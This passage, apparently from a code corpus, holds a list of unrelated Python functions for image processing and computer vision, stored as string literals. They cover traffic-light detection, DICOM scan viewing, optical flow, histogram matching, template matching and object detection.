zip(*img_and_pix)\n \n if verbose:\n print(\"LEN IMGS\", len(images), \"; SHOULD BE\", len(self.separate_colors()))\n \n for i, image in enumerate(images):\n \n # separate into x and y pixels\n pix = pixels[i]\n inferred_lines.append(img_and_pix[i])\n x,y = zip(*np.array(pix))\n \n if verbose:\n print('len(set(y))>20', len(set(y)))\n print('len(set(x))>20', len(set(x)))\n print('len(pix)<= {}; actual: {}'.format(self.background_threshold*np.prod(self.size), len(pix)))\n display(image)\n \n # If pixels don't fluctuate more than pixel_diff_threshold, \n # or size of color is greater than background_threshold..\n if len(pix) <= self.background_threshold*np.prod(self.size):\n if 
len(set(y))>self.pixel_diff_threshold \\\n and len(set(x))>self.pixel_diff_threshold:\n \n # take difference between pixels\n d = np.diff(pix, axis=0)\n segdists = np.sqrt((d ** 2).sum(axis=1))\n\n # Check if one line alone in the bitmap spans min_grid_length.\n # np.argmax(np.bincount(x)) -> keep x constant\n pot_vert_line = [j for i, j in pix if i == np.argmax(np.bincount(x))]\n pot_hor_line = [i for i, j in pix if j == np.argmax(np.bincount(y))]\n \n if verbose:\n print(\"Passed 0.25 pixel threshold and straight line threshold\")\n print(\"sum(segdists)/len(segdists)<7\", sum(segdists)/len(segdists))\n print(\"Y LINE \", pot_vert_line[0], pot_vert_line[-1], self.height*self.min_grid_span)\n print(\"X LINE\" , pot_hor_line[0], pot_hor_line[-1], self.width*self.min_grid_span)\n\n if sum(segdists)/len(segdists)<self.min_pixel_dist and \\\n len(pot_vert_line)<(self.height*self.min_grid_span) and \\\n len(pot_hor_line)<(self.width*self.min_grid_span):\n\n\n# inferred_lines.append(img_and_pix[i])\n # display(image)\n\n actual_y = self.height - np.array(pix)[:,1]\n \n df = pd.DataFrame(pix).groupby(0).agg(np.mean)\n xvals = df.index\n yvals = df.values.flatten().astype(int)\n slope, intercept, rvalue, pvalue, stderr = scp.stats.linregress(xvals, yvals)\n \n change = slope*len(yvals)\n if pvalue > 0.05 or abs(change) < 0.01:\n self.add_label(\"NO TREND\")\n else:\n if slope < 0:\n self.add_label(\"DECREASING\")\n else:\n self.add_label(\"INCREASING\") \n\n if verbose: \n print(\"-\"*50)\n if not self.labels:\n self.add_label(\"NO TREND\")\n return inferred_lines, self.labels", "def get_sun_features(image): # Use grayscale images, outside val: NaN\r\n ratio = sun_isoperimetric_ratio(image)\r\n sun_features = {\"sun_circularity_ratio\": ratio}\r\n return sun_features", "def visualize_in_scan(self, verbose=True):\n images = self.scan.load_all_dicom_images(verbose)\n \n # Preload contours and sort them by z pos.\n contours = sorted(self.contours, key=lambda c: c.image_z_position)\n fnames = self.scan.sorted_dicom_file_names.split(',')\n index_of_contour = [fnames.index(c.dicom_file_name) for c in contours]\n\n fig = plt.figure(figsize=(16,8))\n\n min_slice = min(index_of_contour)\n max_slice = max(index_of_contour)\n current_slice = min_slice\n\n ax_image = fig.add_axes([0.5,0.0,0.5,1.0])\n img = ax_image.imshow(images[current_slice].pixel_array,\n cmap=plt.cm.gray)\n\n contour_lines = []\n # We draw all the contours initally and set the visibility\n # to False. 
This works better than trying create and destroy\n # plots every time we update the image.\n for i,c in enumerate(contours):\n arr = c.to_matrix()\n cc, = ax_image.plot(arr[:,0], arr[:,1], '-r')\n cc.set_visible(i==0) # Set the first contour visible.\n contour_lines.append( cc )\n ax_image.set_xlim(-0.5,511.5); ax_image.set_ylim(511.5,-0.5)\n ax_image.axis('off')\n \n # Add the scan info table\n ax_scan_info = fig.add_axes([0.1, 0.8, 0.3, 0.1])\n ax_scan_info.set_axis_bgcolor('w')\n scan_info_table = ax_scan_info.table(\n cellText=[\n ['Patient ID:', self.scan.patient_id],\n ['Slice thickness:', '%.3f mm' % self.scan.slice_thickness],\n ['Pixel spacing:', '%.3f mm'%self.scan.pixel_spacing]\n ],\n loc='center', cellLoc='left'\n )\n # Remove the cell borders.\n # It Seems like there should be an easier way to do this...\n for cell in scan_info_table.properties()['child_artists']:\n cell.set_color('w')\n\n ax_scan_info.set_title('Scan Info')\n ax_scan_info.set_xticks([])\n ax_scan_info.set_yticks([])\n\n # Add annotations / characteristics table.\n ax_annotation_info = fig.add_axes([0.1, 0.45, 0.3, 0.25])\n ax_annotation_info.set_axis_bgcolor('w')\n\n # Create the rows to be displayed in the annotations table.\n cell_text = []\n for c in _all_characteristics_:\n row = []\n cname = c.capitalize()\n if cname.startswith('Int'):\n cname = 'InternalStructure'\n\n row.append(cname)\n row.append(getattr(self,cname)())\n row.append(getattr(self,c))\n\n cell_text.append(row)\n\n annotation_info_table = ax_annotation_info.table(\n cellText=cell_text,\n loc='center', cellLoc='left', colWidths=[0.45,0.45,0.1]\n )\n\n # Again, remove cell borders.\n for cell in annotation_info_table.properties()['child_artists']:\n cell.set_color('w')\n\n ax_annotation_info.set_title('Annotation Info')\n ax_annotation_info.set_xticks([])\n ax_annotation_info.set_yticks([])\n\n # Add the checkbox for turning contours on / off.\n ax_contour_checkbox = fig.add_axes([0.1, 0.25, 0.1, 0.15])\n ax_contour_checkbox.set_axis_bgcolor('w')\n contour_checkbox = CheckButtons(ax_contour_checkbox,\n ('Show Contours',), (True,))\n contour_checkbox.is_checked = True\n\n # Add the widgets.\n ax_slice = fig.add_axes([0.1, 0.1, 0.3, 0.05])\n ax_slice.set_axis_bgcolor('w')\n txt = 'Z: %.3f'%float(images[current_slice].ImagePositionPatient[-1]) \n sslice = Slider(ax_slice,\n txt,\n 0,\n len(images)-1,\n valinit=current_slice,\n valfmt=u'Slice: %d')\n\n def update(_):\n # Update image itself.\n current_slice = int(sslice.val)\n img.set_data(images[current_slice].pixel_array)\n txt='Z: %.3f'%float(images[current_slice].ImagePositionPatient[-1])\n sslice.label.set_text(txt)\n if contour_checkbox.is_checked:\n for i,c in enumerate(contour_lines):\n flag = (index_of_contour[i] == current_slice)\n flag = flag and (current_slice >= min_slice)\n flag = flag and (current_slice <= max_slice)\n # Set contour visible if flag is True.\n c.set_visible(flag)\n else:\n for c in contour_lines: c.set_visible(False)\n fig.canvas.draw_idle()\n\n def update_contours(_):\n contour_checkbox.is_checked = not contour_checkbox.is_checked\n update(None) # update requires an argument.\n\n sslice.on_changed(update)\n contour_checkbox.on_clicked(update_contours)\n\n plt.show()", "def get_classification(self, image):\n #TODO implement light color prediction\n max_idx = 4\n with self.detection_graph.as_default():\n with tf.Session(graph=self.detection_graph) as sess:\n # Definite input and output Tensors for detection_graph\n image_tensor = 
self.detection_graph.get_tensor_by_name('image_tensor:0')\n \n # Each box represents a part of the image where a particular object was detected.\n detection_boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')\n \n # Each score represent how level of confidence for each of the objects.\n # Score is shown on the result image, together with the class label.\n detection_scores = self.detection_graph.get_tensor_by_name('detection_scores:0')\n detection_classes = self.detection_graph.get_tensor_by_name('detection_classes:0')\n num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')\n # Expand dimensions since the model expects images to have shape: [1, None, None, 3]\n image_np_expanded = np.expand_dims(image, axis=0)\n # Actual detection.\n (boxes, scores, classes, num) = sess.run(\n [detection_boxes, detection_scores, detection_classes, num_detections],\n feed_dict={image_tensor: image_np_expanded})\n\n boxes = np.squeeze(boxes)\n scores = np.squeeze(scores)\n classes = np.squeeze(classes).astype(np.int32)\n min_score_thresh = .50\n # find majority light state\n counter = [0, 0, 0, 0, 0]\n for i in range(boxes.shape[0]):\n if scores is None or scores[i] > min_score_thresh:\n counter[classes[i]] += 1\n for i in range(1, 5):\n if counter[i] > counter[max_idx]:\n max_idx = i\n return self.classmap[max_idx]", "def generateHeatMask( im ):\n featref = computeFeatures(im)\n h,w,nbp = im.shape\n print(\"w:%d,h:%d\"%(w,h))\n heatMap = np.zeros((h,w,1), dtype=np.int8)\n black = [0,0,0]\n white = [255,255,255]\n rMaxDiff = 0\n for j in range(h):\n print(\"j:%d\" % j )\n for i in range(w):\n #~ print(\"i:%d\" % i )\n arDiff = []\n for color in [black,white]:\n #~ print(\"color:%s\" % color)\n imt = np.copy(im)\n \n # quite same time on my tablet !!! 
\n # (would have think the [] would be far fastest!)\n if 0:\n cv2.circle(imt, (i,j), 1, color )\n else:\n imt[j,i]=color\n if 0:\n cv2.imshow(\"imt\",imt)\n cv2.waitKey(1)\n #~ feat = computeFeatures(imt)\n #~ rDiff = diffFeatures(featref,feat)\n rDiff = mseFloat(im,imt)\n arDiff.append(rDiff)\n #~ print(rDiff)\n rDiff = max(arDiff)\n if rDiff > rMaxDiff:\n rMaxDiff = rDiff\n heatMap[j,i] = rDiff*10\n print(\"rMaxDiff: %5.3f\" % rMaxDiff )\n #~ print(dir(cv2))\n #~ heatMap = cv2.resize(heatMap,(w*2,h*2))\n cv2.namedWindow(\"heat\",cv2.CV_WINDOW_AUTOSIZE|cv2.WINDOW_NORMAL)\n cv2.imshow(\"heat\",heatMap)\n cv2.resizeWindow(\"heat\",600,480)\n cv2.waitKey(0)", "def analyze_image(which_cam, image, ntraps, iteration=0, verbose=False):\n threshes = [0.5, 0.6]\n margin = 10\n threshold = np.max(image) * threshes[which_cam]\n im = image.transpose()\n\n x_len = len(im)\n peak_locs = np.zeros(x_len)\n peak_vals = np.zeros(x_len)\n\n ## Trap Peak Detection ##\n for i in range(x_len):\n if i < margin or x_len - i < margin:\n peak_locs[i] = 0\n peak_vals[i] = 0\n else:\n peak_locs[i] = np.argmax(im[i])\n peak_vals[i] = max(im[i])\n\n ## Trap Range Detection ##\n first = True\n pos_first, pos_last = 0, 0\n left_pos = 0\n for i, p in enumerate(peak_vals):\n if p > threshold:\n left_pos = i\n elif left_pos != 0:\n if first:\n pos_first = (left_pos + i) // 2\n first = False\n pos_last = (left_pos + i) // 2\n left_pos = 0\n\n ## Separation Value ##\n separation = (pos_last - pos_first) / ntraps # In Pixels\n\n ## Initial Guesses ##\n means0 = np.linspace(pos_first, pos_last, ntraps).tolist()\n waists0 = (separation * np.ones(ntraps) / 2).tolist()\n ampls0 = (max(peak_vals) * 0.7 * np.ones(ntraps)).tolist()\n _params0 = [means0, waists0, ampls0, [0.06]]\n params0 = [item for sublist in _params0 for item in sublist]\n\n ## Fitting ##\n if verbose:\n print(\"Fitting...\")\n xdata = np.arange(x_len)\n popt, pcov = curve_fit(lambda x, *params_0: wrapper_fit_func(x, ntraps, params_0),\n xdata, peak_vals, p0=params0)\n if verbose:\n print(\"Fit!\")\n plt.figure()\n plt.plot(xdata, peak_vals) # Data\n if iteration:\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, params0), '--r') # Initial Guess\n plt.plot(xdata, wrapper_fit_func(xdata, ntraps, popt)) # Fit\n plt.title(\"Iteration: %d\" % iteration)\n else:\n plt.title(\"Final Product\")\n\n plt.xlim((pos_first - margin, pos_last + margin))\n plt.legend([\"Data\", \"Guess\", \"Fit\"])\n plt.show(block=False)\n print(\"Fig_Newton\")\n trap_powers = np.frombuffer(popt[2 * ntraps:3 * ntraps])\n return trap_powers", "def _connect_components_analysis(image):\n if len(image.shape) == 3:\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n else:\n gray_image = image\n\n return cv2.connectedComponentsWithStats(gray_image, connectivity=8, ltype=cv2.CV_32S)", "def do_stuff(self, net, meta):\n cv2_img = self.img_to_cv2(self.last_img)\n # Now we can use cv2 functions as the image is <type 'numpy.ndarray'>\n # rospy.loginfo(\"cv2_img: \" + str(type(cv2_img)))\n # Your OpenCV stuff\n # cv2_img = cv2.resize(cv2_img, (0,0), fx=0.25, fy=0.25) \n\n (rows,cols,channels) = cv2_img.shape\n # if cols > 60 and rows > 60 :\n # cv2.circle(cv2_img, (50,50), 10, 255)\n \n global x_old\n global no_meas_counter\n global est\n global cor\n global w\n global h\n \n\n r = darknet.detect(net, meta, cv2_img)\n # print(r)\n\n if not r:\n no_meas_counter += 1\n\n for i in r:\n if i[0].decode() == \"person\":\n x, y, w, h = i[2][0], i[2][1], i[2][2], i[2][3]\n xmin, ymin, xmax, ymax = 
darknet.convertBack(float(x), float(y), float(w), float(h))\n pt1 = (xmin, ymin)\n pt2 = (xmax, ymax)\n cv2.rectangle(cv2_img, pt1, pt2, (0, 255, 0), 2)\n cv2.putText(cv2_img, i[0].decode() + \" [\" + str(round(i[1] * 100, 2)) + \"]\", (pt1[0], pt1[1] + 20), cv2.FONT_HERSHEY_SIMPLEX, 1, [0, 255, 0], 4)\n \n global mp\n mp = np.array([[np.float32(x)],[np.float32(y)]])\n cor = kalman.correct(mp)\n no_meas_counter = 0\n\t\t\n\n else:\n no_meas_counter += 1\n \n # x_old = x\n\n # cv2.imshow(\"cv2_img\", cv2_img)\n # k = cv2.waitKey(1)\n # if k == 27:\n # cv2.destroyAllWindows()\n # exit()\n\n if no_meas_counter < 30:\n est = kalman.predict()\n msg = PolygonStamped()\n msg.header.stamp = rospy.Time.now()\n # msg.polygon.points = [Point32(x=x, y=y), Point32(x=cols, y=rows), Point32(x=w, y=h)]\n msg.polygon.points = [Point32(x=est[0], y=est[1]), Point32(x=cols, y=rows), Point32(x=w, y=h)] \n self.pub_yolo_detection.publish(msg)\n\n # cv2.imshow(\"Image window\", cv2_img)\n # cv2.waitKey(3)\n\n self.pub_images(cv2_img)\n self.is_new_img = False", "def visualize_detection(self, image):\n\t\tH, W, _ = image.shape\n\t\tpos_list = self.apply_detection(image)\n\t\tdetections = {}\n\t\thasDetection = False\n\t\tfor i, L in enumerate(pos_list):\n\t\t\ttext, coordinates = L[0], L[1]\n\t\t\tCOLOR = COLORS[text]\n\t\t\tfor x, y, w, h in coordinates:\n\t\t\t\t# prune bad homography points\n\t\t\t\tif x < 0 or y < 0 or x + w > W or \\\n\t\t\t\t y + h > H or w <= 1 or h <= 1:\n\t\t\t\t\tcontinue\n\t\t\t\t# add the detection to the dict for tracking\n\t\t\t\tdetections[self.num_detect] = (x, y, w, h)\n\t\t\t\tself.detection_index[self.num_detect] = (x, y, w, h, self.num_save, text)\n\t\t\t\tself.num_detect += 1\n\t\t\t\thasDetection = True\n\t\t\t\t# if the detection is human\n\t\t\t\tif text == 'face':\n\t\t\t\t\tgender = self.genderDetect.classify(image[y:y+h, x:x+w, :])\n\t\t\t\t\tgender = 'female' if gender[0] < 0.5 else 'male'\n\t\t\t\t\tcv2.putText(image, gender, (x + w // 2 -10, y + h + 15),\n\t\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, COLOR, 2, cv2.LINE_AA)\n\n\t\t\t\timage = cv2.rectangle(image, (x, y), (x + w, y + h), COLOR, 2)\n\t\t\t\tcv2.putText(image, text, (x, y - 5),\n\t\t\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.6, COLOR, 2, cv2.LINE_AA)\n\t\tif hasDetection:\n\t\t\tself.detection_frames[self.num_save] = detections\n\t\tself.num_save +=1\n\t\treturn image", "def cs4243_histmatch(ori_image, refer_image):\n \n ##your code here ###\n\n # get cdf of ori and ref image\n grey_level = 256\n ori_hist, ori_cum_hist, ori_res_image, ori_uni_hist = cs4243_histequ(ori_image, grey_level)\n ref_hist, ref_cum_hist, ref_res_image, ref_uni_hist = cs4243_histequ(refer_image, grey_level)\n \n # map each ori cdf to ref cdf and get the mapped index as matched grey level\n map_value = []\n for i in range(grey_level):\n ori_cdf = ori_cum_hist[i]\n matched_intensity = np.uint8(np.abs(ref_cum_hist - ori_cdf).argmin())\n map_value.append(matched_intensity)\n ##\n\n # Set the intensity of the pixel in the raw image to its corresponding new intensity \n height, width = ori_image.shape\n res_image = np.zeros(ori_image.shape, dtype='uint8') # Note the type of elements\n for i in range(height):\n for j in range(width):\n res_image[i,j] = map_value[ori_image[i,j]]\n \n res_hist = np.bincount(res_image.flatten(), minlength=256)\n \n return ori_hist, ref_hist, res_image, res_hist", "def observation(self, img):\r\n img = img[25:200]\r\n img = cv2.resize(img, self.img_size[1:])\r\n if not self.color:\r\n img = img.mean(-1, 
keepdims=True)\r\n\r\n return img.transpose([2, 0, 1]) / 255", "def perform_event_analysis():\n\n tol = 2.0 # Arcmin\n calib_on_colours = False\n\n params = get_args()\n\n log = start_log(params)\n\n (star_catalog,image_trios,catalog_header) = read_combined_star_catalog(params,log)\n\n lightcurves = read_lightcurves(params,log)\n\n target = find_target_data(params,star_catalog,lightcurves,image_trios,log)\n\n (source, blend) = calc_source_blend_params(params,log)\n\n source = calc_source_lightcurve(source, target, log)\n\n measure_photometric_source_colours(params,target,log)\n\n (det_idx, cat_idx, close_cat_idx) = index_valid_star_entries(star_catalog,\n target,tol,log,\n valid_cat=True)\n\n deltas = calibrate_instrumental_colour_colour_diagram(params,star_catalog,\n catalog_header,target,\n det_idx,cat_idx,close_cat_idx,\n log,\n calib=calib_on_colours)\n\n RC = localize_red_clump(star_catalog,close_cat_idx,log)\n\n analyse_colour_mag_diagrams(params,star_catalog,catalog_header,\n target, source,blend,RC,\n det_idx,cat_idx,close_cat_idx,log)\n\n RC = measure_RC_offset(params,RC,target,log)\n\n (target,source,blend) = calc_phot_properties(target, source, blend, RC, log)\n\n plot_colour_colour_diagram(params,star_catalog,catalog_header,\n target, source, blend, RC,\n det_idx,cat_idx,close_cat_idx, log)\n\n (source, blend) = match_source_blend_isochrones(params,source,blend,log)\n\n (source, blend) = calc_source_blend_ang_radii(source, blend, log)\n\n (source, blend) = calc_source_blend_physical_radii(source, blend, log)\n\n (source,blend) = calc_source_blend_distance(source, blend, RC, log)\n\n lens = calc_lens_parameters(params, source, RC, log)\n\n output_red_clump_data_latex(params,RC,log)\n\n output_source_blend_data_latex(params,source,blend,log)\n\n output_lens_parameters_latex(params,source,lens,log)", "def image_preprocessing(img):\n\n # Removing parasite data (sky, trees and front of the car)\n return img[60:-20, :, :]", "def detect_velocity(image):\n nonlocal prev, v_last\n curr_bgr = cv.warpPerspective(image, M, (160, 120))\n curr = cv.cvtColor(curr_bgr, cv.COLOR_BGR2GRAY)\n\n if prev is None:\n prev = curr\n v_last = 0.0\n return v_last, curr_bgr, np.zeros_like(image)\n\n flow = cv.calcOpticalFlowFarneback(\n prev, # Previous image\n curr, # Current image\n None, # Computed flow image that has the same size oas prev and type CV_32FC2.\n 0.5, # Specifies the image scale (<1) to build pyramids for each image.\n 3, # Number of pyramid layers including the initial image.\n 15, # winsize, averaging windows size.\n 3, # iterations, number of iterations the algorithm does at each pyramid level.\n 5, # standard deviation of the Gaussian that is used to smooth derivative\n 1.5,\n 0)\n\n mag, ang = cv.cartToPolar(flow[..., 0], flow[..., 1])\n\n v = mag * np.sin(ang)\n\n ######################\n ## Histogram for mag\n ar = np.arange(-20.0, 20.0, 0.50, dtype=np.float)\n his = np.histogram(v, bins=ar)\n\n for i, n in enumerate(his[0]):\n bgr = (255, 255, 0)\n if his[1][i] < 0:\n bgr = (0, 255, 255)\n\n #print('[{}] {} - {}'.format(i, n, his[1][i]))\n cv.rectangle( image, #curr_bgr,\n (i*2, HEIGHT),\n (i*2, HEIGHT - int(n / 10)),\n bgr, #(0, 255, 255),\n cv.FILLED)\n\n hsv = np.zeros_like(image)\n hsv[..., 0] = ang * 180 / np.pi / 2\n hsv[..., 1] = 255\n hsv[..., 2] = cv.normalize(np.abs(v), None, 0, 255, cv.NORM_MINMAX)\n hsv_bgr = cv.cvtColor(hsv, cv.COLOR_HSV2BGR)\n ##\n ######################\n\n v_abs = np.absolute(v)\n v = v[v_abs >= np.percentile(v_abs, VELOCITY_CUTOFF_PCT)]\n\n v_max 
= v_last + MAX_ACC\n v_min = v_last - MAX_ACC\n v = np.clip(v, v_min, v_max)\n if v.size > 0:\n v_avg = v.mean()\n else:\n if v_last > 0:\n v_avg = max(v_last - MAX_ACC, 0)\n elif v_last < 0:\n v_avg = min(v_last + MAX_ACC, 0)\n else:\n v_avg = 0\n\n prev = curr\n v_last = v_avg\n return v_last, curr_bgr, hsv_bgr", "def detect_sea_lions_in_image(filename,\n model,\n patch_h,\n patch_w,\n resize_image_patch_to_h, \n resize_image_patch_to_w,\n resize_mask_patch_to_h,\n resize_mask_patch_to_w,\n display_mask=False):\n\n train_image = cv2.imread(filename)\n image_patches_list = dhap.slice_the_image_into_patches(train_image, patch_h, patch_w)\n\n # Recombine the image from the patches (train_image.shape != image.shape)\n # bacause the size of the image is adjusted to be a multiple of patch_h and patch_w. \n image = dhap.combine_pathes_into_image(image_patches_list)\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n # Resize the patches to the ones used by the model.\n image_patches_list = dhap.resize_patches_in_patches_list(image_patches_list, \n resize_image_patch_to_h, \n resize_image_patch_to_w)\n\n mask_patches_list = apply_model_to_image_patches_list(image_patches_list, model)\n\n # The model outputs a (1,n) vertor. Reshape it to a matrix.\n mask_patches_list = reshape_patches_list(mask_patches_list,\n resize_mask_patch_to_h,\n resize_mask_patch_to_w)\n\n mask_patches_list = resized_image_patches_list = dhap.resize_patches_in_patches_list(mask_patches_list, \n patch_h, \n patch_w)\n\n mask = dhap.combine_pathes_into_mask(mask_patches_list)\n\n image = dhap.apply_mask(image, mask)\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(mask)\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n\n if (display_mask == True):\n fig, ax = plt.subplots()\n cax = ax.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n cbar = fig.colorbar(cax)\n plt.axis(\"off\")\n plt.show() \n\n\n\n print(mask_patches_list[0][0].shape)\n\n\n #combine_pathes_into_image(patches_list", "def find_objects_in_image(self, image, visualize):\n self.select(image)\n\n for scan_region in self.scan_regions:\n self.set_scaling(scan_region[0])\n full, small = self.find_instances(image, scan_region[1], 0.5)\n if (visualize):\n fig = plt.figure(figsize=(30, 20))\n plt.imshow(small)\n plt.title(\"Scan region {} using scaling {}\".format(scan_region[1], scan_region[0]))\n plt.show()", "def GAN_COLOUR_FEATURE(image):\n import cv2\n import numpy as np\n \n \n img = cv2.imread(image)\n hsv = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n ycc = cv2.cvtColor(img,cv2.COLOR_BGR2YCrCb)\n \n Feature = np.concatenate([cooccurence_3D_matrix(img, True),\n cooccurence_2D_matrix(hsv[:,:,0],True),\n cooccurence_2D_matrix(hsv[:,:,1],True),\n cooccurence_2D_matrix(ycc[:,:,1],True),\n cooccurence_2D_matrix(ycc[:,:,2],True)],\n axis = None)\n \n return Feature", "def traffic_light_detection(img_in, radii_range, noisy_image=False, max_x_offset=5):\n\n img = process_base_image(img_in, (7, 7))\n\n # find all the circles in an image using Hough Circles\n min_radii = min(radii_range)\n max_radii = max(radii_range)\n # the distance between the circles should be the smallest possible circles that can touch.\n min_dist = min_radii * 2 + 10\n\n # img, dp, min_dist, param1, param2, minRad, maxRad\n if noisy_image:\n circles = hough_circles(img, 1.55, min_dist, 20, 15, min_radii, max_radii)\n else:\n circles = 
hough_circles(img, 1.125, min_dist, 30, 20, min_radii, max_radii)\n\n if circles is None:\n return (0, 0), None\n else:\n # cleanup circles so its easier to use.\n circles = circles[0, :]\n # round the numbers of the array to uint16 values.\n circles = np.uint16(np.around(circles))\n\n if len(circles) < 3:\n return (1000, 1000), None\n else: # If there are more than 3 circles found, eliminate the outliers that shouldn't be detected.\n # sort the circles first by x, then by Radius value, then by Y value.\n circles = sorted(circles, key=lambda c: (c[0], c[2], c[1]))\n\n # since the traffic lights will be a group of 3 circles with a similar radius, then x value, then somewhat close\n # in y value, use a \"window\" type of sliding group to create groups of 3 circles that can then be compared\n # to each other to see if they would make up circles of a traffic light.\n circle_groups = []\n for c_idx in range(len(circles) - 2):\n circle_group = circles[c_idx: c_idx + 3] # build the group\n circle_groups.append(circle_group)\n\n circle_groups = np.array(circle_groups)\n # for each circle group found, need to figure out the group with the lowest overall standard deviation.\n # for each group, calculate the std deviations.\n group_deviations = np.array([circle_group_deviations(g) for g in circle_groups])\n\n most_similar_idx = np.argmin(group_deviations)\n final_circles = circle_groups[most_similar_idx]\n\n # if the circles aren't close to each other in the X direction, return\n # none since its not a traffic light.\n x_diffs = np.diff(final_circles[:, 0])\n if np.any(x_diffs >= max_x_offset):\n return (None, None), None\n\n # sort the circles from top down to allow color compare.\n circles = final_circles[np.argsort(final_circles[:, 1])] # sort by Y direction.\n # creating some names for clarity due to x, y being col, row.\n red_row, red_col, yellow_row, yellow_col, green_row, green_col = [\n circles[0][1],\n circles[0][0],\n circles[1][1],\n circles[1][0],\n circles[2][1],\n circles[2][0],\n ]\n\n # determine colors.\n state = 'yellow' # default state.\n cords = (yellow_col, yellow_row)\n\n red_color = np.array([0, 0, 255])\n green_color = np.array([0, 255, 0])\n\n # stop for false positive labels.\n if img_in[yellow_row, yellow_col][0] > 10:\n return (None, None), None\n\n if (img_in[red_row, red_col] == red_color).all():\n state = 'red'\n elif (img_in[green_row, green_col] == green_color).all():\n state = 'green'\n\n # print 'Color of TL midpoint is {}'.format(img_in[yellow_row, yellow_col])\n\n return cords, state", "def detect(img, template):\r\n\r\n #detect threshold\r\n args = parse_args()\r\n threshold=dictornary(args)\r\n\r\n # detect edges of image\r\n \"\"\"prewitt_x = [[1, 0, -1]] * 3\r\n prewitt_y = [[1] * 3, [0] * 3, [-1] * 3]\r\n img_x = task1.detect_edges(img, prewitt_x, False)\r\n img_y = task1.detect_edges(img, prewitt_y, False)\r\n img_norm = task1.edge_magnitude(img_x, img_y)\r\n\r\n task1.write_image(task1.normalize(img_norm), \".//img_norm.jpg\")\r\n\r\n # detect edges in template\r\n\r\n temp_x = task1.detect_edges(template, prewitt_x, False)\r\n temp_y = task1.detect_edges(template, prewitt_y, False)\r\n template_norm = task1.edge_magnitude(temp_x, temp_y)\r\n\r\n task1.write_image(task1.normalize(template_norm), \".//template_norm.jpg\") \"\"\"\r\n\r\n img_norm = task1.normalize(img)\r\n template_norm = task1.normalize(template)\r\n\r\n coordinates = []\r\n temp_h = len(template_norm)\r\n temp_w = len(template_norm[0])\r\n\r\n rows = len(img_norm)\r\n cols = 
len(img_norm[0])\r\n\r\n output = [[0 for x in range(len(img_norm[0]))] for y in range(len(img_norm))]\r\n cropped_img = [[0 for x in range(temp_w)] for y in range(temp_h)]\r\n\r\n for i in range(rows):\r\n for j in range(cols):\r\n\r\n if ((i +temp_h) < rows and (j + temp_w < cols)):\r\n cropped_img = utils.crop(img_norm, i, i + temp_h, j, j + temp_w)\r\n\r\n\r\n img_mul_temp = utils.elementwise_mul(cropped_img, template_norm)\r\n sum = 0\r\n # sum of every elemnet in img_mul_temp\r\n for p in range(temp_h):\r\n for q in range(temp_w):\r\n sum += img_mul_temp[p][q]\r\n\r\n # squaring every element in denominator of image\r\n square_img = utils.elementwise_mul(cropped_img, cropped_img)\r\n numsum_img = 0\r\n for d in range(len(cropped_img)):\r\n for e in range(len(cropped_img[0])):\r\n numsum_img += square_img[d][e]\r\n\r\n # squaring every element in denominator of template\r\n square_temp = utils.elementwise_mul(template_norm, template_norm)\r\n numsum_temp = 0\r\n for k in range(temp_h):\r\n for l in range(temp_w):\r\n numsum_temp += square_temp[k][l]\r\n\r\n denominator = np.sqrt((numsum_img * numsum_temp))\r\n\r\n if (denominator != 0):\r\n output[i][j] = (sum / denominator)\r\n if (output[i][j] > threshold):\r\n coordinates.append([i, j])\r\n\r\n # TODO: implement this function.\r\n # raise NotImplementedError\r\n return coordinates", "def get_classification(self, image):\n if self.correct_gamma:\n if self.gamma == 1.0:\n self.gamma = 0.6\n elif self.gamma == 0.6:\n self.gamma = 1.0\n image = self.adjust_gamma(image, self.gamma)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n image_np = np.asarray(image, dtype=\"uint8\")\n image_np_expanded = np.expand_dims(image_np, axis=0)\n\n detected = False\n\n with self.detection_graph.as_default():\n (boxes, scores, classes, num) = self.sess.run(\n [self.detection_boxes, self.detection_scores, self.detection_classes, self.num_detections],\n feed_dict={self.image_tensor: image_np_expanded})\n boxes = np.squeeze(boxes)\n classes = np.squeeze(classes).astype(np.int32)\n scores = np.squeeze(scores)\n best_scores = []\n\n for idx, classID in enumerate(classes):\n if self.MODEL_NAME == 'ssdlite_mobilenet_v2_coco_2018_05_09':\n if classID == 10: # 10 is traffic light\n if scores[idx] > 0.10: #confidence level\n best_scores.append([scores[idx], idx, classID])\n detected = True\n else: # we tuned the model to classify only traffic lights\n if scores[idx] > 0.10: # confidence level\n best_scores.append([scores[idx], idx, classID])\n detected = True\n\n tl_index = TrafficLight.UNKNOWN\n if detected:\n best_scores.sort(key=lambda tup: tup[0], reverse=True)\n\n best_score = best_scores[0]\n rospy.logdebug(\"number of TL found %d, best score: %f, color: %f\", len(best_scores), best_score[0], best_score[2])\n nbox = boxes[best_score[1]]\n\n height = image.shape[0]\n width = image.shape[1]\n\n box = np.array([nbox[0]*height, nbox[1]*width, nbox[2]*height, nbox[3]*width]).astype(int)\n box_height = box[2] - box[0]\n box_width = box[3] - box[1]\n ratio = float(box_height)/float(box_width)\n rospy.logdebug(\"ratio: %f\", ratio)\n if ratio >= 2.0 and ratio < 3.0: #started from 2.4\n tl_cropped = image[box[0]:box[2], box[1]:box[3]]\n tl_color, tl_index = self.get_color(tl_cropped)\n #color = ['RED', 'YELLOW', 'GREEN', 'UNKNOWN']\n #tl_index = best_score[2]\n #tl_color = color[tl_index]\n #augment image with detected TLs\n cv2.rectangle(image, (box[1], box[0]), (box[3], box[2]), (0, 255, 0), 2)\n font = cv2.FONT_HERSHEY_SIMPLEX\n font_color = (255, 255, 255)\n 
